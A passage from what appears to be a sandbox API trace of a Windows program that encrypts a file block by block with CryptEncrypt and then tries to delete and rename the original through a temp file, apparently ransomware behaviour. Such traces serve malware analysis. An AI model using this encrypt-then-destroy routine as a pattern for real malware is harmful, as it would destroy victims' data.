lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.523] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.523] GetLastError () returned 0x0 [0154.523] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.523] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.523] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.523] GetLastError () returned 0x0 [0154.523] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.523] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.523] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.523] GetLastError () returned 0x0 [0154.523] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.523] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.523] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.523] GetLastError () returned 0x0 [0154.523] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.523] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.523] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.524] GetLastError () returned 0x0 [0154.524] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.524] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.524] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.524] GetLastError () returned 0x0 [0154.524] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.524] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.524] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.524] GetLastError () returned 0x0 [0154.524] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.524] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.524] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.524] GetLastError () returned 0x0 [0154.524] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.524] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.524] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.524] GetLastError () returned 0x0 [0154.524] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.524] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.524] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.524] GetLastError () returned 0x0 [0154.524] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.524] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.525] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.525] GetLastError () returned 0x0 [0154.525] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.525] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.525] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.525] GetLastError () returned 0x0 [0154.525] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.525] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.525] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.525] GetLastError () returned 0x0 [0154.525] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.525] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.525] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.525] GetLastError () returned 0x0 [0154.525] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.525] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.525] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.525] GetLastError () returned 0x0 [0154.525] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.525] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.525] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.525] GetLastError () returned 0x0 [0154.525] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.525] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.525] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.525] GetLastError () returned 0x0 [0154.526] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.526] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.526] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.526] GetLastError () returned 0x0 [0154.526] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.526] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.526] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.526] GetLastError () returned 0x0 [0154.526] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.526] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.526] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.526] GetLastError () returned 0x0 [0154.526] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.526] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.526] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.526] GetLastError () returned 0x0 [0154.526] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.526] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.526] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.526] GetLastError () returned 0x0 [0154.526] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.526] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.526] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.526] GetLastError () returned 0x0 [0154.526] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.527] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.527] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.527] GetLastError () returned 0x0 [0154.527] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.527] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.527] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.527] GetLastError () returned 0x0 [0154.527] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.527] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.527] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.527] GetLastError () returned 0x0 [0154.527] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.527] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.527] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.527] GetLastError () returned 0x0 [0154.527] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.527] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.527] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.527] GetLastError () returned 0x0 [0154.527] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.527] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.527] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0154.528] GetLastError () returned 0x0 [0154.528] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0154.528] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0154.528] WriteFile (in: hFile=0x588, lpBuffer=0x29012e8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0154.528] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-mx\\tipresx.dll.mui")) returned 0x20 [0154.528] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\tipresx.dll.mui", dwFileAttributes=0x20) returned 0 [0154.528] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\tipresx.dll.mui") returned 1 [0154.528] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-mx\\tipresx.dll.mui")) returned 0 [0154.529] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\tipresx.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\tipresx.dll.mui" [0154.529] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\tipresx.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX") returned 1 [0154.529] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\.xXCEC6.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-mx\\.xxcec6.tmp")) returned 0xcec6 [0154.529] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-mx\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\.xXCEC6.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-mx\\.xxcec6.tmp"), dwFlags=0x1) returned 0 [0154.530] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\.xXCEC6.tmp" (normalized: 